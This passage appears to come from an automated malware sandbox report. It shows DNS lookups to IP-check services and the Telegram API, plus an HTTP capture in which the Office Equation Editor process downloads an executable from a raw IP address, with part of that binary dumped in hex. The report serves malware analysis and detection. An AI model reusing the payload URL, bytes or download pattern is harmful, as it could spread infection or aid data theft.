                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.356524944 CET8.8.8.8192.168.2.220x37f5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:46.369837999 CET8.8.8.8192.168.2.220xed14No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:48.686278105 CET8.8.8.8192.168.2.220xd3a2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:48.686278105 CET8.8.8.8192.168.2.220xd3a2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.512583971 CET8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:51.527028084 CET8.8.8.8192.168.2.220x25d7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:52.474083900 CET8.8.8.8192.168.2.220xe995No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:52.474083900 CET8.8.8.8192.168.2.220xe995No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.261039972 CET8.8.8.8192.168.2.220x5eeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.270457029 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:53.277770996 CET8.8.8.8192.168.2.220x54b3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:54.326879025 CET8.8.8.8192.168.2.220xda4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:54.326879025 CET8.8.8.8192.168.2.220xda4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.140669107 CET8.8.8.8192.168.2.220x5e4aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:55.150285006 CET8.8.8.8192.168.2.220x9d2fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.161493063 CET8.8.8.8192.168.2.220x2c0fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.161493063 CET8.8.8.8192.168.2.220x2c0fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.977310896 CET8.8.8.8192.168.2.220x4e7dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:57.668102026 CET8.8.8.8192.168.2.220x9000No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:57.668102026 CET8.8.8.8192.168.2.220x9000No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:59.425887108 CET8.8.8.8192.168.2.220x7350No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:59.425887108 CET8.8.8.8192.168.2.220x7350No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.072565079 CET8.8.8.8192.168.2.220x1916No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.072565079 CET8.8.8.8192.168.2.220x1916No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:14.276907921 CET8.8.8.8192.168.2.220x12b1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:14.276907921 CET8.8.8.8192.168.2.220x12b1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:15.108767033 CET8.8.8.8192.168.2.220x7160No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • 87.120.84.38
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.224916187.120.84.38803256C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:40.220944881 CET322OUTGET /txt/qHbynE8Vgwabsy3.exe HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                          Host: 87.120.84.38
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:19:41.176788092 CET1236INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.26.2
                                                                                                          Date: Wed, 30 Oct 2024 07:19:41 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 787968
                                                                                                          Connection: keep-alive
                                                                                                          Last-Modified: Tue, 29 Oct 2024 06:19:00 GMT
                                                                                                          ETag: "c0600-625978f9ea95d"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 60 00 a3 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fc 0b 00 00 08 00 00 00 00 00 00 2a 1a 0c 00 00 20 00 00 00 20 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 19 0c 00 4f 00 00 00 00 20 0c 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 00 f7 0b 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2`0* @ `@O @p H.text0 `.rsrc @@.reloc@@BHui^@0((}&*0{+*0%{o(&rpsz*0)(,(}{&*"#0E{o {(,(}{{&*>?0s!b%,(rOp~("s#
                                                                                                          Oct 30, 2024 08:19:41.176856995 CET1236INData Raw: 00 00 0a 0c 2b 7c 00 08 6f 24 00 00 0a 0d 09 07 6f 25 00 00 0a 13 04 11 04 28 01 00 00 2b 1c fe 01 13 05 11 05 2c 5a 00 73 20 00 00 06 13 06 11 06 11 04 16 9a 6f 15 00 00 06 00 11 06 11 04 17 9a 6f 17 00 00 06 00 11 06 11 04 18 9a 6f 19 00 00 06
                                                                                                          Data Ascii: +|o$o%(+,Zs ooooooo'o(:ro)&+*0is(rOpooo*Yo+rS
                                                                                                          Oct 30, 2024 08:19:41.176894903 CET1236INData Raw: 00 00 04 2a 26 00 02 28 23 00 00 06 00 2a 1b 30 04 00 f1 00 00 00 08 00 00 11 00 00 02 02 7b 0d 00 00 04 02 7b 0e 00 00 04 6f 03 00 00 06 7d 0f 00 00 04 02 7b 12 00 00 04 02 7b 0d 00 00 04 6f 02 00 00 06 02 7b 0e 00 00 04 6f 1e 00 00 0a 6f 14 00
                                                                                                          Data Ascii: *&(#*0{{o}{{o{ooo;{{o{ooo;{{o{ooo;{{{o{oo(9(<o={{oo;
                                                                                                          Oct 30, 2024 08:19:41.176928997 CET636INData Raw: 70 6f 3b 00 00 0a 00 02 7b 16 00 00 04 28 5c 00 00 0a 6f 50 00 00 0a 00 02 7b 16 00 00 04 20 26 02 00 00 1f fe 73 46 00 00 0a 6f 47 00 00 0a 00 02 7b 16 00 00 04 72 af 01 00 70 6f 48 00 00 0a 00 02 7b 16 00 00 04 1f 1f 20 ce 02 00 00 73 49 00 00
                                                                                                          Data Ascii: po;{(\oP{ &sFoG{rpoH{ sIoJ{oL{oM"A"As](^(_(OoP O sI(`(a{ob(a{ob(a{ob(a{
                                                                                                          Oct 30, 2024 08:19:41.176963091 CET1236INData Raw: 02 00 70 6f 78 00 00 0a 14 fe 03 13 06 11 06 2c 24 00 02 28 6b 00 00 0a 11 05 6f 6b 00 00 0a 72 0d 02 00 70 6f 78 00 00 0a 73 6d 00 00 06 6f 79 00 00 0a 00 00 02 11 05 6f 7a 00 00 0a 28 7b 00 00 0a 00 02 11 05 6f 7c 00 00 0a 28 7d 00 00 0a 00 02
                                                                                                          Data Ascii: pox,$(kokrpoxsmoyoz({o|(}o~(o(o(o(((3+susv(w(7sj(kol(,on*0
                                                                                                          Oct 30, 2024 08:19:41.176996946 CET1236INData Raw: 11 06 6f a6 00 00 0a 11 07 6f a6 00 00 0a fe 01 2b 01 16 13 0b 11 0b 2d d4 11 06 6f a5 00 00 0a 11 06 6f a4 00 00 0a fe 01 13 0c 11 0c 2c 06 00 07 13 0d de 51 00 00 11 09 6f a7 00 00 0a 13 0e 11 0e 3a 56 ff ff ff 00 de 2d 00 11 06 14 fe 03 13 0f
                                                                                                          Data Ascii: oo+-oo,Qo:V-,o,oo&+*h<-0ryp(s}s}(8rp(9}(8ryp(9}#
                                                                                                          Oct 30, 2024 08:19:41.177030087 CET1236INData Raw: 6f b3 00 00 0a 6f bd 00 00 0a 17 59 6f be 00 00 0a 6f bf 00 00 0a 02 7b 1a 00 00 04 6f 02 00 00 06 11 04 6f 1e 00 00 0a 6f 16 00 00 06 6f c0 00 00 0a 26 02 7b 26 00 00 04 6f b3 00 00 0a 02 7b 26 00 00 04 6f b3 00 00 0a 6f bd 00 00 0a 17 59 6f be
                                                                                                          Data Ascii: ooYoo{oooo&{&o{&ooYoo{oooo&X{oo:*0!sUo&s}(<*0}{o{
                                                                                                          Oct 30, 2024 08:19:41.177063942 CET1236INData Raw: 00 00 0a 16 fe 02 0a 06 2c 0d 00 23 00 00 00 00 00 00 00 40 0b 2b 0d 00 23 00 00 00 00 00 00 00 00 0b 2b 00 07 2a 13 30 02 00 34 00 00 00 1c 00 00 11 00 02 7b 26 00 00 04 6f c4 00 00 0a 6f c5 00 00 0a 16 fe 02 0a 06 2c 0d 00 23 00 00 00 00 00 00
                                                                                                          Data Ascii: ,#@+#+*04{&oo,#@+#+*0P(D{=o{2o(I&{<o{.o{o*0+,{"+,{"o5(
                                                                                                          Oct 30, 2024 08:19:41.177098989 CET848INData Raw: 00 00 04 6f db 00 00 0a 1a 8d 4a 00 00 01 25 16 02 7b 29 00 00 04 a2 25 17 02 7b 27 00 00 04 a2 25 18 02 7b 28 00 00 04 a2 25 19 02 7b 2a 00 00 04 a2 6f dc 00 00 0a 00 02 7b 26 00 00 04 02 7b 33 00 00 04 6f dd 00 00 0a 00 02 7b 26 00 00 04 28 de
                                                                                                          Data Ascii: oJ%{)%{'%{(%{*o{&{3o{&(o{&rCp"33#AsQoR{&(\oT{&o{&{+o{& sFoG{&so{&o{&rpoH
